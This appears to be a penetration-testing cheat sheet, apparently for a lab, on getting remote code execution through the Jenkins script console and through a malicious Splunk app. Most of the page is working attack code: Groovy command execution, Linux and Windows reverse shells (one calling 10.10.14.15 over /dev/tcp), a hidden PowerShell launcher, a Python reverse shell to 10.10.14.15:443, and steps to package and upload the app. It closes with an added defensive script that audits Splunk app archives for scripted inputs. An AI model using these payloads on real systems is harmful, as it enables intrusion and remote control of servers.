# Application Attacks

This page covers attacks on applications such as:

1. Jenkins
2. Splunk

## Jenkins

After gaining access to the Jenkins script console at `http://jenkins.inlanefreight.local:8000/script`, we can run arbitrary Groovy code there, which gives us RCE on the server.

### Linux RCE

{% code overflow="wrap" lineNumbers="true" %}

```groovy
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
```

{% endcode %}

### Linux Reverse Shell

{% code overflow="wrap" lineNumbers="true" %}

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

{% endcode %}

### Windows RCE

```groovy
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
```

### Windows Reverse Shell

{% code overflow="wrap" lineNumbers="true" %}

```groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

{% endcode %}

## Splunk

Reverse Shell using Splunk: <https://github.com/0xjpuff/reverse_shell_splunk>

This lets us build a Splunk application that runs our commands on the server and makes the reverse connection.

`inputs.conf`

{% code overflow="wrap" lineNumbers="true" %}

```editorconfig
[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```

{% endcode %}

`run.bat`

{% code overflow="wrap" lineNumbers="true" %}

```batch
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
```

{% endcode %}

`rev.py`

{% code overflow="wrap" lineNumbers="true" %}

```python
import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```

{% endcode %}

Create the Splunk application

{% code overflow="wrap" lineNumbers="true" %}

```shell-session
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
```

{% endcode %}

Start a listener for the reverse shell on our machine, then upload the file via `Install app from file` in the Splunk UI.
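From the defender's side, the packaging steps above point to a pre-install check. The following is an added example, not code from this page or the linked repository: it opens a `.spl` archive in memory and lists every `[script://...]` scripted input the app would register. The `default/` + `bin/` layout, the function names and the placeholder script body are assumptions of this example.

```python
import io
import posixpath
import tarfile

# Constructed sample: the page's two scripted-input stanzas (sourcetype lines omitted).
INPUTS_CONF = (b"[script://./bin/rev.py]\ndisabled = 0\ninterval = 10\n"
               b"[script://.\\bin\\run.bat]\ndisabled = 0\ninterval = 10\n")

def build_sample_spl():
    """Build a constructed .spl in memory; default/ + bin/ layout and script body are assumed."""
    files = {"reverse_shell_splunk/default/inputs.conf": INPUTS_CONF,
             "reverse_shell_splunk/bin/rev.py": b"# placeholder body\n"}
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def parse_stanzas(text):
    """Minimal .conf parser returning {stanza: {key: value}}; comments are skipped."""
    stanzas, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = stanzas.setdefault(line[1:-1], {})
        elif current is not None and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()
    return stanzas

def audit_spl(spl_bytes):
    """List scripted inputs an archive would register; only '1'/'true' count as disabled here."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(spl_bytes), mode="r:*") as tar:
        files = {posixpath.normpath(m.name): m for m in tar.getmembers() if m.isfile()}
        for name, member in files.items():
            if posixpath.basename(name) != "inputs.conf":
                continue
            app_root = posixpath.dirname(posixpath.dirname(name))
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for stanza, kv in parse_stanzas(text).items():
                if not stanza.startswith("script://"):
                    continue
                target = stanza[len("script://"):].replace("\\", "/")
                script = posixpath.normpath(posixpath.join(app_root, target))
                off = kv.get("disabled", "0").lower() in ("1", "true")
                findings.append({"script": script, "bundled": script in files,
                                 "enabled": not off, "interval": kv.get("interval")})
    return findings
```

Any enabled scripted input with a short `interval` in an app from an untrusted source deserves review before installation, since Splunk runs the referenced script on that schedule.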


